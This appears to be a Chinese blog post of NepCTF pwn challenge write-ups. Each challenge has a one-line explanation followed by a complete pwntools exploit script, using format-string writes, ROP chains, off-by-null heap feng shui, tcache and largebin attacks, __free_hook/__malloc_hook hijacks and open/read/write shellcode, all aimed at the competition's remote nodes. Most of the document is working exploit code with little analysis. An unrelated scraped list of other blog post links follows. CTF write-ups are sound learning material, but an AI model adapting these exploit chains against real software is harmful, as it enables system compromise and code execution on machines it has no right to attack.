cnitlrt
cnitlrt

nepctf-pwn

题解

xhh:

劫持堆上的函数指针为后门函数以此来getshell

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'

binary = 'xhh'
elf = ELF('xhh')
libc = elf.libc
context.binary = binary

DEBUG = 1
if DEBUG:
  p = process(binary)
else:
  host = "node2.hackingfor.fun"
  port =  35467 
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
payload = "a"*0x10+p8(0xe5)
# p.recv()
# gdb.attach(p)
sleep(0.01)
p.send(payload)
p.interactive()
easypwn

格式化字符串漏洞,修改rbp一字节为0,在后面leave_ret的时候会进行转移,在上面和下面放置上ropchain,在转移的时候有一定几率会撞到我们的ropchain,从而完成attack

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'
binary = 'easypwn'
elf = ELF('easypwn')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
else:
  host = "node2.hackingfor.fun"
  port =  36610
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
poprdi = 0x0000000000400be3
poprbp = 0x00000000004007c8
poprsi = 0x0000000000400be1
leaver = 0x0000000000400a1f
payload =  p64(poprdi)+p64(0)+p64(poprsi)+p64(elf.bss()+0x300)
payload += p64(0)+p64(elf.plt["read"])+p64(poprbp)+p64(elf.bss()+0x300-0x8)
payload += p64(leaver)
payload1 = ""
# payload = ""
# for i in range(9):
#   payload += p64(0x602120+i)
# payload = p64(0x602120)*9
payload1 = p64(poprbp)*4+p64(0x6020C0-0x8)+p64(leaver)
# payload1 = p64(0x6020c0)*0x6
p.recv()
p.send(payload)
p.recv()
p.send("%22$hhn")
p.recv()
# gdb.attach(p,"""
#   b snprintf
#   b *0x400a1e
#   b *0x04007c8
#   """)
# pause()
p.send(payload1)
sleep(0.01)
payload = p64(poprdi)+p64(elf.got["puts"])+p64(elf.plt["puts"])
payload += p64(poprdi)+p64(0)+p64(poprsi)+p64(elf.bss()+0x200)
payload += p64(0)+p64(elf.plt["read"])
payload += p64(poprbp)+p64(elf.bss()+0x200-0x8)+p64(leaver)

# gdb.attach(p,"b *0x0000000000400be3")
p.sendline(payload)
sleep(0.01)
libc_base = l64()-libc.sym["puts"]
lg("libc_base",libc_base)
poprax = 0x0000000000043ae8+libc_base
poprsi = 0x0000000000023eea+libc_base
poprdx = 0x0000000000001b96+libc_base
syscall_ret = libc_base+0x00000000000d2745
sh_addr = libc_base+libc.search("/bin/sh\x00").next()
payload = p64(poprdi)+p64(sh_addr)+p64(poprsi)+p64(0)
payload += p64(poprdx)+p64(0)+p64(poprax)+p64(59)+p64(syscall_ret)

p.sendline(payload)
p.interactive()
easystack

栈溢出,覆盖argv[0]为flag的地址,故意触发canary从而输出flag

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'

binary = 'easystack'
elf = ELF('easystack')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
else:
  host = "node2.hackingfor.fun"
  port =  32356
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
payload = p64(0x6cde20)*100
# p.recv()
# gdb.attach(p,"b *0x400A47")
p.sendline(payload)
p.interactive()
superpower

格式化字符串漏洞,通过调试分析可以知道fclose会调用free,因此劫持free_hook为system,同时劫持free在堆上的参数为sh来getshell

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'

binary = 'superpower'
elf = ELF('superpower')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
else:
  host = "node2.hackingfor.fun"
  port =  39964 
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
p.recv()
p.sendline("/proc/self/maps")
ru("superpower\n")
ru("superpower\n")
ru("superpower\n")
# ru("superpower\n")
heap_addr = int(ru("-")[:-1],16)
lg("heap_addr",heap_addr)

libc_base = ru("heap]\n")
libc_base = int(ru('-')[:-1],16)+0x1000
lg("libc_base",libc_base)
sys_addr = libc_base+libc.sym["system"]
"""
0x3a81c execve("/bin/sh", esp+0x28, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x28] == NULL

0x3a81e execve("/bin/sh", esp+0x2c, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x2c] == NULL

0x3a822 execve("/bin/sh", esp+0x30, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x30] == NULL

0x3a829 execve("/bin/sh", esp+0x34, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x34] == NULL

0x5f075 execl("/bin/sh", eax)
constraints:
  esi is the GOT address of libc
  eax == NULL

0x5f076 execl("/bin/sh", [esp])
constraints:
  esi is the GOT address of libc
  [esp] == NULL
"""
one = libc_base+0x3a81c
one = 0x8048754
one = libc_base+libc.sym["system"]
lg("one",one)
o1 = one & 0xffff
o2 = one >> 16
sh = 0x6873
lg("o1",o1)
lg("o2",o2)
lg("sh",sh)
# if sh > o2:
# # payload = "aaa"
#   payload = "%{}c%35$hn".format(o2)
#   payload = "%{}c%2$hn".format(sh-o2)
#   payload += "%{}c%36$hn".format(o1-sh)
#   payload = payload.ljust(0x20,"a")
#   payload += p32(libc_base+libc.sym["__free_hook"])
#   payload += p32(libc_base+libc.sym["__free_hook"]+0x2)
# else:
payload = "%{}c%39$n".format(sh)
# payload = "%{}c%39$hn".format(sh)
payload += "%{}c%40$hn".format(o1-sh)
payload += "%{}c%41$hn".format(o2-o1)
payload = payload.ljust(0x30,"a")
payload += p32(heap_addr+0x168)
payload += p32(libc_base+libc.sym["__free_hook"])
payload += p32(libc_base+libc.sym["__free_hook"]+0x2)
print payload
p.recv()
# gdb.attach(p,"b *0x080487B8")
p.sendline(payload)
p.interactive()
scmt

格式化字符串漏洞,泄露随机数来getshell

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
#context.log_level = 'debug'

binary = 'scmt'
elf = ELF('scmt')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
else:
  host = "node2.hackingfor.fun"
  port =  39601
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
p.recv()
p.sendline("%8$p")
ru("0x")
code1 = int(ru('\n')[:-1],16)
lg("code1",code1)
p.recv()
# gdb.attach(p)
p.sendline(str(code1))
p.interactive()
NULL_FXCK

off by null漏洞,用堆风水来制造chunk_overlapping,泄露出libc,largebin attack劫持tls结构体里面存放的tcache_entry地址,来实现将tcache_entry转移从而使tcache_entry可控,造成任意地址申请原语,然后伪造一个chunk链,链上有三个chunk,chunk1->chunk2(存放codebase的address)->codebase,当我们把chunk1和chunk2申请下来的以后bins上会剩下两次key加密的codebase,然后我们此时free一个堆重叠过且size相同的堆块即可通过show来泄露出codebase,泄露出codebase以后便可以劫持bss段上存放数组指针的地址,然后就可以为所欲为,这里我选择的是劫持的栈来进行rop

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
# context.log_level = 'debug'

binary = 'fxck'
elf = ELF('fxck')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
else:
  host = "node2.hackingfor.fun"
  port =  30597 
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def cmd(idx):
    sla(">> ",str(idx))
def add(size,payload = ""):
    cmd(1)
    sla("Size: ",str(size))
    if payload:
        sa("tent: ",payload)
    else:
        sa("tent: ","aaa")
def free(idx):
    cmd(3)
    sla("dex: ",str(idx))
def show(idx):
    cmd(4)
    sla("dex: ",str(idx))
def edit(idx,payload):
    cmd(2)
    sla("dex: ",str(idx))
    sa("tent: ",payload)
def addWhere(addr,payload):
    free(4)
    add(0x520,"a"*0x20+p64(0)+p64(0x4a1)+p64(0)*9+p64(0x0001000000000000)+"\x00"*0x198+p64(addr)+'\x00'*0x100)
    add(0x300,payload)
def largebinAttack(addr):
    free(4)
    add(0x520,"a"*0x20+p64(0)+p64(0x4a1)+p64(0)*3+p64(addr-0x20))
    free(8)
    add(0x478)

add(0x148) #0   
add(0x4f8) #1
add(0x1f8) #2

add(0x4f8) #3
add(0x4f8) #4
add(0x4f8) #5
add(0x4f8) #6

add(0x4f8) #7
add(0x4f8) #8
add(0x4f8) #9
add(0x4f8) #10

free(6)
free(4)
free(8)
free(3)
add(0x528,"a"*0x4f0+p64(0)+p64(0xa00))#3
add(0x4c0)#4
add(0x4f0)#6
add(0x4f0)#8
free(4)
free(5)
add(0x4f0)#4
add(0x4c8)
free(8)
free(4)
free(6)
add(0x4f0,"a"*0x9)#4
add(0x4f0)#6
add(0x4f0)#8
free(6)
free(8)
free(7)
add(0x520,"a"*0x4f0+p64(0)+p64(0x501)+"a")#6
add(0x4c8)#8
add(0x4f0)#7
edit(5,"a"*0x4c0+p64(0xa00))
free(4)
add(0x520)
add(0x1000)
show(5)
libc_base = l64()-0x1e4160
lg("libc_base",libc_base)
add(0x1f8)
add(0x7c0)
free(5)
show(12)
key = u64(p.recv(5).ljust(8,"\x00"))
lg("key",key)
add(0x1f8)
free_hook1 = libc.sym["__free_hook"]+libc_base&0xfffffffffffff000
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x4a1)+"a"*0x490+p64(0)+p64(0x21)*7)
free(13)
add(0x480,'aa')
poprdi = 0x000000000002858f+libc_base
leaver = 0x000000000005591c+libc_base
poprsi = 0x000000000002ac3f+libc_base
pop2r = 0x00000000001597d6+libc_base
poprax = 0x0000000000045580+libc_base
syscall = 0x00000000000611ea+libc_base
poprdx = 0x0000000000114161+libc_base
poprsp = 0x000000000003418a+libc_base
add(0x358+0x20-0x40,p64(0)+p64(pop2r)+p64(free_hook1)+p64(0)+p64(leaver)+p64(poprdi)+p64(0)+p64(poprax)+p64(0)+p64(poprdx)+p64(0x1000)+p64(syscall)+p64(poprsp)+p64(free_hook1))
free(8)
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x4a1)+p64(0)*3+p64(0x1eb538+libc_base-0x20))
free(13)
#chunk 8
add(0x478,p64(0)*9+p64(0x0001000000000000)+"\x00"*0x198+p64(libc_base+libc.sym["__free_hook"])+'\x00'*0x100)
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x4a1)+p64(0)*9+p64(0x0001000000000000)+"\x00"*0x198+p64(libc_base+0x1e7600+0x20)+'\x00'*0x100)
#chunk 13
add(0x300,p8(0))
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x4a1)+p64(0)*3+p64(0x1e7600+0x20+libc_base-0x20))
free(8)
add(0x478)
# free(4)
# add(0x520,"a"*0x20+p64(0)+p64(0x4a1))
show(13)
heap_addr = u64(p.recv(6).ljust(8,"\x00"))
lg("heap_addr",heap_addr)
addr = libc_base+0x21c1e0
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x4a1)+p64(0)*9+p64(0x0001000000000000)+"\x00"*0x198+p64(heap_addr+0x10)+'\x00'*0x100)
add(0x300,p64(0)*2)
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x311)+p64(addr^key)+p64(0)*8+p64(0x0004000000000000)+"\x00"*0x198+p64(heap_addr+0x10)+'\x00'*0x100)
add(0x300,"a")
add(0x300,"a")
free(15)
show(16)
key2 = addr >> 12
bss_addr = u64(p.recv(6).ljust(8,"\x00")) ^key^key2
bss_addr = bss_addr+0x4020
lg("bss_addr",bss_addr)
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x311)+p64(0)*9+p64(0x0001000000000000)+"\x00"*0x198+p64(bss_addr+0x140)+'\x00'*0x100)
add(0x300,p64(libc_base+libc.sym["environ"]))
show(0)
stack_addr = l64()
lg("stack_addr",stack_addr)
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x4a1)+p64(0)*9+p64(0x0001000000000000)+"\x00"*0x198+p64(stack_addr-0x148)+'\x00'*0x100)
payload = p64(poprsi)*2+p64(free_hook1)+p64(poprdi)+p64(0)+p64(poprax)+p64(0)+p64(poprdx)+p64(0x1000)*2+p64(syscall)+p64(poprsp)+p64(free_hook1)
add(0x300,payload)
payload = [poprdi,free_hook1,poprsi,0x2000,poprdx,0x7,0x7,poprax,10,syscall,free_hook1+0x70]
sc = shellcraft.open("./flag.txt",0)
sc += shellcraft.read("rax",free_hook1+0x300,0x100)
sc += shellcraft.write(1,free_hook1+0x300,0x100)
p.sendline(flat(payload).ljust(0x70,"\x90")+asm(sc))
# gdb.attach(p)
p.interactive()
sooooeasy

glibc2.23 uaf没有show,劫持stdout泄露libc然后劫持malloc_hook 用libc_realloc来调整栈帧

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'

binary = 'sooooeasy'
elf = ELF('sooooeasy')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
else:
  host = "node2.hackingfor.fun"
  port =  30226
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def cmd(idx):
    sla("choice : ",str(idx))
def add(size,name,message = ""):
    cmd(1)
    sla("your name: \n",str(size))
    sa("name:\n",name)
    if message:
        sla("message:\n",message)
    else:
        sla("message:\n","aaa")
def free(idx):
    cmd(2)
    sla("index:\n",str(idx))
add(0x68,"aaa")
add(0x90,'aaa')
add(0x68,"aaa")
add(0x68,"aaa")
free(1)
add(0x68,p16(0x2620-0x43))
free(0)
free(2)
free(0)
add(0x68,p8(0x0))
add(0x68,p8(0x0))
add(0x68,p8(0x0))
add(0x68,p8(0x0))
cmd(1)
sla("your name: \n",str(0x60))
sa("name:\n","a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0x88))
# add(0x60,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0x88))
libc_base = l64()-libc.sym["_IO_2_1_stdin_"]
lg("libc_base",libc_base)
sla("message:\n","aaa")
malloc_hook = libc_base+libc.sym["__malloc_hook"]
free(0)
free(3)
free(0)
add(0x68,p64(malloc_hook-0x23))
add(0x68,p64(malloc_hook-0x23))
"""
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf0364 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1207 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
"""
add(0x68,p64(malloc_hook-0x23))
add(0x68,"a"*(0x13-0x8)+p64(0xf1207+libc_base)+p64(libc_base+libc.sym["__libc_realloc"]+0x4))
# add(0x38,p16(0x2620))
cmd(1)
# gdb.attach(p)
p.interactive()

你可能感兴趣的:(nepctf-pwn)

  • nepctf-pwn cnitlrt
    题解xhh:劫持堆上的函数指针为后门函数以此来getshell#!/usr/bin/envpython#-*-coding:utf-8-*-importsysimportosfrompwnimport*#__Author__=Cnitlrtcontext.log_level='debug'binary='xhh'elf=ELF('xhh')libc=elf.libccontext.binary=b
  • 矩阵求逆(JAVA)初等行变换 qiuwanchi 矩阵求逆(JAVA)
    package gaodai.matrix; import gaodai.determinant.DeterminantCalculation; import java.util.ArrayList; import java.util.List; import java.util.Scanner; /** * 矩阵求逆(初等行变换) * @author 邱万迟 *
  • JDK timer antlove javajdkschedulecodetimer
    1.java.util.Timer.schedule(TimerTask task, long delay):多长时间(毫秒)后执行任务 2.java.util.Timer.schedule(TimerTask task, Date time):设定某个时间执行任务 3.java.util.Timer.schedule(TimerTask task, long delay,longperiod
  • JVM调优总结 -Xms -Xmx -Xmn -Xss coder_xpf jvm应用服务器
    堆大小设置JVM 中最大堆大小有三方面限制:相关操作系统的数据模型(32-bt还是64-bit)限制;系统的可用虚拟内存限制;系统的可用物理内存限制。32位系统下,一般限制在1.5G~2G;64为操作系统对内存无限制。我在Windows Server 2003 系统,3.5G物理内存,JDK5.0下测试,最大可设置为1478m。 典型设置: java -Xmx
  • JDBC连接数据库 Array_06 jdbc
    package Util; import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; public class JDBCUtil { //完
  • Unsupported major.minor version 51.0(jdk版本错误) oloz java
    java.lang.UnsupportedClassVersionError: cn/support/cache/CacheType : Unsupported major.minor version 51.0 (unable to load class cn.support.cache.CacheType) at org.apache.catalina.loader.WebappClassL
  • 用多个线程处理1个List集合 362217990 多线程threadlist集合
      昨天发了一个提问,启动5个线程将一个List中的内容,然后将5个线程的内容拼接起来,由于时间比较急迫,自己就写了一个Demo,希望对菜鸟有参考意义。。 import java.util.ArrayList; import java.util.List; import java.util.concurrent.CountDownLatch; public c
  • JSP简单访问数据库 香水浓 sqlmysqljsp
    学习使用javaBean,代码很烂,仅为留个脚印 public class DBHelper { private String driverName; private String url; private String user; private String password; private Connection connection; privat
  • Flex4中使用组件添加柱状图、饼状图等图表 AdyZhang Flex
    1.添加一个最简单的柱状图 ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 <?xml version= "1.0"&n
  • Android 5.0 - ProgressBar 进度条无法展示到按钮的前面 aijuans android
    在低于SDK < 21 的版本中,ProgressBar 可以展示到按钮前面,并且为之在按钮的中间,但是切换到android 5.0后进度条ProgressBar 展示顺序变化了,按钮再前面,ProgressBar 在后面了我的xml配置文件如下:   [html]  view plain copy   <RelativeLa
  • 查询汇总的sql baalwolf sql
    select   list.listname, list.createtime,listcount from dream_list as list ,   (select listid,count(listid) as listcount  from dream_list_user  group by listid  order by count(
  • Linux du命令和df命令区别 BigBird2012 linux
            1,两者区别             du,disk usage,是通过搜索文件来计算每个文件的大小然后累加,du能看到的文件只是一些当前存在的,没有被删除的。他计算的大小就是当前他认为存在的所有文件大小的累加和。        
  • AngularJS中的$apply,用还是不用? bijian1013 JavaScriptAngularJS$apply
            在AngularJS开发中,何时应该调用$scope.$apply(),何时不应该调用。下面我们透彻地解释这个问题。         但是首先,让我们把$apply转换成一种简化的形式。         scope.$apply就像一个懒惰的工人。它需要按照命
  • [Zookeeper学习笔记十]Zookeeper源代码分析之ClientCnxn数据序列化和反序列化 bit1129 zookeeper
    ClientCnxn是Zookeeper客户端和Zookeeper服务器端进行通信和事件通知处理的主要类,它内部包含两个类,1. SendThread 2. EventThread, SendThread负责客户端和服务器端的数据通信,也包括事件信息的传输,EventThread主要在客户端回调注册的Watchers进行通知处理   ClientCnxn构造方法   &
  • 【Java命令一】jmap bit1129 Java命令
    jmap命令的用法:   [hadoop@hadoop sbin]$ jmap Usage: jmap [option] <pid> (to connect to running process) jmap [option] <executable <core> (to connect to a
  • Apache 服务器安全防护及实战 ronin47
    此文转自IBM. Apache 服务简介 Web 服务器也称为 WWW 服务器或 HTTP 服务器 (HTTP Server),它是 Internet 上最常见也是使用最频繁的服务器之一,Web 服务器能够为用户提供网页浏览、论坛访问等等服务。 由于用户在通过 Web 浏览器访问信息资源的过程中,无须再关心一些技术性的细节,而且界面非常友好,因而 Web 在 Internet 上一推出就得到
  • unity 3d实例化位置出现布置? brotherlamp unity教程unityunity资料unity视频unity自学
    问:unity 3d实例化位置出现布置? 答:实例化的同时就可以指定被实例化的物体的位置,即 position  Instantiate (original : Object, position : Vector3, rotation : Quaternion) : Object 这样你不需要再用Transform.Position了,   如果你省略了第二个参数(
  • 《重构,改善现有代码的设计》第八章 Duplicate Observed Data bylijinnan java重构
    import java.awt.Color; import java.awt.Container; import java.awt.FlowLayout; import java.awt.Label; import java.awt.TextField; import java.awt.event.FocusAdapter; import java.awt.event.FocusE
  • struts2更改struts.xml配置目录 chiangfai struts.xml
    struts2默认是读取classes目录下的配置文件,要更改配置文件目录,比如放在WEB-INF下,路径应该写成../struts.xml(非/WEB-INF/struts.xml) web.xml文件修改如下:   <filter> <filter-name>struts2</filter-name> <filter-class&g
  • redis做缓存时的一点优化 chenchao051 redishadooppipeline
            最近集群上有个job,其中需要短时间内频繁访问缓存,大概7亿多次。我这边的缓存是使用redis来做的,问题就来了。       首先,redis中存的是普通kv,没有考虑使用hash等解结构,那么以为着这个job需要访问7亿多次redis,导致效率低,且出现很多redi
  • mysql导出数据不输出标题行 daizj mysql数据导出去掉第一行去掉标题
    当想使用数据库中的某些数据,想将其导入到文件中,而想去掉第一行的标题是可以加上-N参数 如通过下面命令导出数据: mysql -uuserName -ppasswd -hhost -Pport -Ddatabase -e " select * from tableName"  > exportResult.txt 结果为: studentid
  • phpexcel导出excel表简单入门示例 dcj3sjt126com PHPExcelphpexcel
    先下载PHPEXCEL类文件,放在class目录下面,然后新建一个index.php文件,内容如下 <?php error_reporting(E_ALL); ini_set('display_errors', TRUE); ini_set('display_startup_errors', TRUE);   if (PHP_SAPI == 'cli') die('
  • 爱情格言 dcj3sjt126com 格言
     1) I love you not because of who you are, but because of who I am when I am with you.    我爱你,不是因为你是一个怎样的人,而是因为我喜欢与你在一起时的感觉。   2) No man or woman is worth your tears, and the one who is, won‘t
  • 转 Activity 详解——Activity文档翻译 e200702084 androidUIsqlite配置管理网络应用
    activity 展现在用户面前的经常是全屏窗口,你也可以将 activity 作为浮动窗口来使用(使用设置了 windowIsFloating 的主题),或者嵌入到其他的 activity (使用 ActivityGroup )中。 当用户离开 activity 时你可以在 onPause() 进行相应的操作 。更重要的是,用户做的任何改变都应该在该点上提交 ( 经常提交到 ContentPro
  • win7安装MongoDB服务 geeksun mongodb
    1.  下载MongoDB的windows版本:mongodb-win32-x86_64-2008plus-ssl-3.0.4.zip,Linux版本也在这里下载,下载地址: http://www.mongodb.org/downloads   2.  解压MongoDB在D:\server\mongodb, 在D:\server\mongodb下创建d
  • Javascript魔法方法:__defineGetter__,__defineSetter__ hongtoushizi js
    转载自: http://www.blackglory.me/javascript-magic-method-definegetter-definesetter/ 在javascript的类中,可以用defineGetter和defineSetter_控制成员变量的Get和Set行为 例如,在一个图书类中,我们自动为Book加上书名符号: function Book(name){
  • 错误的日期格式可能导致走nginx proxy cache时不能进行304响应 jinnianshilongnian cache
    昨天在整合某些系统的nginx配置时,出现了当使用nginx cache时无法返回304响应的情况,出问题的响应头: Content-Type:text/html; charset=gb2312 Date:Mon, 05 Jan 2015 01:58:05 GMT Expires:Mon , 05 Jan 15 02:03:00 GMT Last-Modified:Mon, 05
  • 数据源架构模式之行数据入口 home198979 PHP架构行数据入口
    注:看不懂的请勿踩,此文章非针对java,java爱好者可直接略过。   一、概念 行数据入口(Row Data Gateway):充当数据源中单条记录入口的对象,每行一个实例。   二、简单实现行数据入口 为了方便理解,还是先简单实现: <?php /** * 行数据入口类 */ class OrderGateway { /*定义元数
  • Linux各个目录的作用及内容 pda158 linux脚本
    1)根目录“/”   根目录位于目录结构的最顶层,用斜线(/)表示,类似于 Windows 操作系统的“C:\“,包含Fedora操作系统中所有的目录和文件。   2)/bin   /bin   目录又称为二进制目录,包含了那些供系统管理员和普通用户使用的重要 linux命令的二进制映像。该目录存放的内容包括各种可执行文件,还有某些可执行文件的符号连接。常用的命令有:cp、d
  • ubuntu12.04上编译openjdk7 ol_beta HotSpotjvmjdkOpenJDK
    获取源码 从openjdk代码仓库获取(比较慢) 安装mercurial Mercurial是一个版本管理工具。 sudo apt-get install mercurial 将以下内容添加到$HOME/.hgrc文件中,如果没有则自己创建一个: [extensions] forest=/home/lichengwu/hgforest-crew/forest.py fe
  • 将数据库字段转换成设计文档所需的字段 vipbooks 设计模式工作正则表达式
            哈哈,出差这么久终于回来了,回家的感觉真好!         PowerDesigner的物理数据库一出来,设计文档中要改的字段就多得不计其数,如果要把PowerDesigner中的字段一个个Copy到设计文档中,那将会是一件非常痛苦的事情。
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他